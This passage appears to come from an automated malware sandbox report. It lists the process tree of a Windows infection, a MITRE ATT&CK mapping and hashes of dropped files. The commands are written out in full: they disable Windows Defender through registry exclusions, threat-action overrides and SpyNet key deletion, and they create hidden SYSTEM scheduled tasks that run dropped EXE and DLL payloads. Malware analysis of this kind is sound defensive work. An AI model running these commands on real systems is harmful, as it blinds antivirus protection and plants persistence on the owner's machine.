"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:1212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:2736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LlsUhQdDHwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LlsUhQdDHwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XiSQzoDDNriU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XiSQzoDDNriU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iwPzvUpjWnASC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iwPzvUpjWnASC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uOxyKSRzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uOxyKSRzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pjDWGDfluocYRbVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pjDWGDfluocYRbVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EomvLlobCzofdwkvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EomvLlobCzofdwkvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LSboZybBtnRusxzk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LSboZybBtnRusxzk\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:844

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LlsUhQdDHwUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LlsUhQdDHwUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XiSQzoDDNriU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XiSQzoDDNriU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iwPzvUpjWnASC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iwPzvUpjWnASC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uOxyKSRzU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uOxyKSRzU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pjDWGDfluocYRbVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pjDWGDfluocYRbVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:2292

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EomvLlobCzofdwkvR /t REG_DWORD /d 0 /reg:32
3⤵
PID:368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EomvLlobCzofdwkvR /t REG_DWORD /d 0 /reg:64
3⤵
PID:880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LSboZybBtnRusxzk /t REG_DWORD /d 0 /reg:32
3⤵
PID:1056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LSboZybBtnRusxzk /t REG_DWORD /d 0 /reg:64
3⤵
PID:1308

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJgbWtRjG" /SC once /ST 18:06:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3580

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJgbWtRjG"
2⤵
PID:2532

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJgbWtRjG"
2⤵
PID:1648

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "rAGvRcSmKNmXDYhyc" /SC once /ST 02:27:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\LSboZybBtnRusxzk\cMRMiEewQkrOhlL\YIcBoOh.exe\" FL /site_id 525403 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2936

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "rAGvRcSmKNmXDYhyc"
2⤵
PID:2908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:848

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1824

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:1408

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1752

C:\Windows\Temp\LSboZybBtnRusxzk\cMRMiEewQkrOhlL\YIcBoOh.exe
C:\Windows\Temp\LSboZybBtnRusxzk\cMRMiEewQkrOhlL\YIcBoOh.exe FL /site_id 525403 /S
1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:2292

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:704

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2664

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1364

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1192

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1312

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1304

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3212

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2880

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3176

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1936

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:424

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bUbwOjBFLYdfVuOzuH"
2⤵
PID:2096

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:3220

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:428

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:2632

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:3528

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\uOxyKSRzU\HEFwJl.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "otWutwTqMGFqoHm" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1964

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "otWutwTqMGFqoHm2" /F /xml "C:\Program Files (x86)\uOxyKSRzU\kVzzyHe.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:440

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "otWutwTqMGFqoHm"
2⤵
PID:2308

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "otWutwTqMGFqoHm"
2⤵
PID:3228

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "NxTjlCislVZVNt" /F /xml "C:\Program Files (x86)\XiSQzoDDNriU2\ryMTXPM.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4048

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OmNzxBEevuWdN2" /F /xml "C:\ProgramData\pjDWGDfluocYRbVB\AnIMgoi.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3188

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "efGkMKlTIdYpJuuVI2" /F /xml "C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR\JwQELSZ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:512

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dgBcICjOMDqThPteMSD2" /F /xml "C:\Program Files (x86)\iwPzvUpjWnASC\YsthQLr.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1708

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kdhWAIqXLMPgJoPbW" /SC once /ST 16:48:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\LSboZybBtnRusxzk\VNuXkQFq\VIOQkhh.dll\",#1 /site_id 525403" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:420

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "kdhWAIqXLMPgJoPbW"
2⤵
PID:2632

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
2⤵
PID:3248

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
3⤵
PID:3040

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
2⤵
PID:2880

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
3⤵
PID:3948

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rAGvRcSmKNmXDYhyc"
2⤵
PID:3996

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\LSboZybBtnRusxzk\VNuXkQFq\VIOQkhh.dll",#1 /site_id 525403
1⤵
PID:1964

C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\LSboZybBtnRusxzk\VNuXkQFq\VIOQkhh.dll",#1 /site_id 525403
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:608

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kdhWAIqXLMPgJoPbW"
3⤵
PID:2900

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\DVpfpCDmHJslAJqjDSR\JwQELSZ.xml
MD5
cb5f5000434256957d2c5e6d03956524

SHA1
d99cacf3bcdd245b7ae801fe201a17af7e893a41

SHA256
d68e4ed36a56878ceabaa66209612d415003d661fac418676d173b59a5a505d1

SHA512
aef42455544efa549f39b440b3455548ef59138b9cad6eafa1278440fb2be110beaaecb51f05f94d5e28315931439dedffafcd888bb015d50218e52b0495323a

Download Submit
C:\Program Files (x86)\XiSQzoDDNriU2\ryMTXPM.xml
MD5
537c4b8aae872ebd28c79db9711c99e0

SHA1
5b54ce112c1dba40eab1b27a248f02aa7585654a

SHA256
068c1b8fc5d60e436636a0d9a2954f02d124781097a14f0d74888c3b6c3a5d9b

SHA512
4336cb8ddea5575d7721d065fde12630b2ec53c1dcdd0430a56213d18f5b8b8fabc49a0c0c2cbcd0b168018e2eff7e5f2ecf406305a3faeadac6cefd3d99d5dd

Download Submit
C:\Program Files (x86)\iwPzvUpjWnASC\YsthQLr.xml
MD5
0bc70dd5f20a1e79b7a9093f8d44462e

SHA1
ba8f0779b33639c3e2c19ecbae57c29be62f698f

SHA256
48d2d90153dd5be90dee5c9c4c194001fc029578dd93b010308bee18aa275273

SHA512
f2ef992d730fea79eccde7763106d00e55f573b15c68eecc8aa9f5e25f589ffdffed34df2bcf92795a409454bfbfd82ac6fe51efc7b37c157bacd3df9fddcd58

Download Submit
C:\Program Files (x86)\uOxyKSRzU\kVzzyHe.xml
MD5
2c13a3f8106b0de056a270908dcda46e

SHA1
376894d71e19972fa73b666f87d3e83a50884e15

SHA256
e7d8090626340db1546aa36fc8b4a58b7f40e1ebba40abc4ef1a5ac07f293f29

SHA512
288a5498db964c4ccd956b2e76ca34d00b6f19c1dd0eb04a838730561720a306f79a888a5f776c4a173fc5f91729491364da88764885649252cbae775607e49a

Download Submit
C:\ProgramData\pjDWGDfluocYRbVB\AnIMgoi.xml
MD5
99eea5a5eadd5dba66f517fc77702dce

SHA1
b8192df795d2b2451a2a243a5ac0d06fa7840d21

SHA256
0ef9e587c52b6806d1a521acc5d4da4834bed6594c7806a0d0b0cf1bf7ab6485

SHA512
553a7293f83d6cf5cebbec296b71bb60daadffb502ec5daeef0165b7c08f625cbf4c523c06451ff102992a0c64af528a13e35a52f590396c182f91c5f6859050

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
MD5
f6c90ab0db80c6c3ea92556fda7273c7

SHA1
01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

SHA256
a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

SHA512
aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
135f26270e8c684833b8566d9c2866a2

SHA1
87cd350829048ae363e7ecd2daa972185e9d4ead

SHA256
94378c18d6246744cf4dca55ef238b53d16dfc62c8eb1b716702970ff449fb15

SHA512
36ec74ceea412950decd5833ca848c30d4941e4e9d3f1d293b702d2df88c40047cd062a0b0b562a350a91173b09ce39360693855c32c47b8995aef38c4bbb48b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9b12fd7273e9686274af79f3bc6f992f

SHA1
7ee91704b5f27c09ffbc1a565b94c70ef0e3b905

SHA256
416d8592525d127c8efaee2688423121bd6a101651383928936887ae7fd75e19

SHA512
858e6e943f84484a037df96245c8a30357a2bcaa13e851ef77fa4c828c31d6eba56a095dd3986cc8ad733c7f038bd510ee9accdc6b7fedcfbd5e85a87c01f6a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5500c6c78e57e8ddb90260affdc247df

SHA1
cbcb86ea09159c55cca33f62f750041e389eadcd

SHA256
d67bea0715e8919477a432c5bacf2806d08da02eaede5da3336b81d5e8712a60

SHA512
44069102818fab581ac8ec0dd871a1e3e00818365ee40bc5cbfd3ce9bffca43897bb733e48b406641df5d0b6f77d6f0ad15b0b33d50ad99134a45fffa30f2798

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5a09ee757a1849a8b34591db1ca1df0f

SHA1
6f360bf4b07a5bafc92dda84dc43015a4895a8a7

SHA256
f8e1e7190b9c0c77df71f9f688088dd43fa63d7f49a87918ea807b0bec563b4c

SHA512
933abdcf81ac2c927cc7b99a33384c202d16834f161489795b93efb7632bab16ec102be366b6fb8810bfe988b0d81447b3d11bf7fd9681d58e3d6e4308106266

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e40e9e690ded47f8eaa1250e2ecf3ea5

SHA1
8e6c619b92e3f8814715bd9e200a3098f15aede8

SHA256
00289340671e76959b52e9190c09ad57edfa169524ba932df0a1ea53a23fac39

SHA512
b0848ca541bc42266a08f8bd08d852373ad3b19178d53a11b9018aadcf525a287b9fb11404cb45cda413e6b03d9deaa5a1dd434d479dca2de9c0c71c7b63d489

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSD429.tmp\Install.exe
MD5
15cae3d82f171da06515edaea12845fa

SHA1
3b34454b7dd62d20d313a375855d2c2690cb579f

SHA256
38b1d94faa67c6f067d8872e00592a0220716b098a54b52d2697782baf043dc2

SHA512
5f5982d53c27d0efbe55905b39d5e6c23dfa796cf913005c28537271f752cf78f31146c2f7d3d93489df55003a9976aa69d415f11048f3c2639f33b8737e50f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSD429.tmp\Install.exe
MD5
15cae3d82f171da06515edaea12845fa

SHA1
3b34454b7dd62d20d313a375855d2c2690cb579f

SHA256
38b1d94faa67c6f067d8872e00592a0220716b098a54b52d2697782baf043dc2

SHA512
5f5982d53c27d0efbe55905b39d5e6c23dfa796cf913005c28537271f752cf78f31146c2f7d3d93489df55003a9976aa69d415f11048f3c2639f33b8737e50f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSD979.tmp\Install.exe
MD5
fbe5ed93aea36d2eacecaba7b694e876

SHA1
11ded0849a104ec1bbc04b006121f5f4a65b2750

SHA256
